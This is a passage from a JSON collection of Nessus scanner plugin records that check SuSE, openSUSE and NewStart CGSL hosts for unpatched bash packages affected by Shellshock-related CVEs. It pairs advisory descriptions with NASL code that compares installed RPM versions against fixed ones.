value:\"2022/07/28\");\n\n script_name(english:\"SuSE 11.3 Security Update : bash (SAT Patch Number 9780)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and is less serious due to\nthe special, non-default system configuration that is needed to create\nan exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with\nBASH_FUNC_. This hardening feature is work in progress and might be\nimproved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-6271.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7169.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7187.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 9780.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:14", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . This hardening feature is work in progress and might be improved in later updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-563.NASL", "href": "https://www.tenable.com/plugins/nessus/77966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-563.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77966);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00039.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:55:57", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . This hardening feature is work in progress and might be improved in later updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-564.NASL", "href": "https://www.tenable.com/plugins/nessus/77967", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77967);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00052.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:23:10", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple vulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-27T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543"], "modified": "2022-05-09T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:bash", "p-cpe:/a:zte:cgsl_main:bash-debuginfo", "p-cpe:/a:zte:cgsl_main:bash-debugsource", "p-cpe:/a:zte:cgsl_main:bash-devel", "p-cpe:/a:zte:cgsl_main:bash-doc", "cpe:/o:zte:cgsl_main:6"], "id": "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/154582", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0118. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154582);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2016-0634\", \"CVE-2016-7543\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple\nvulnerabilities:\n\n 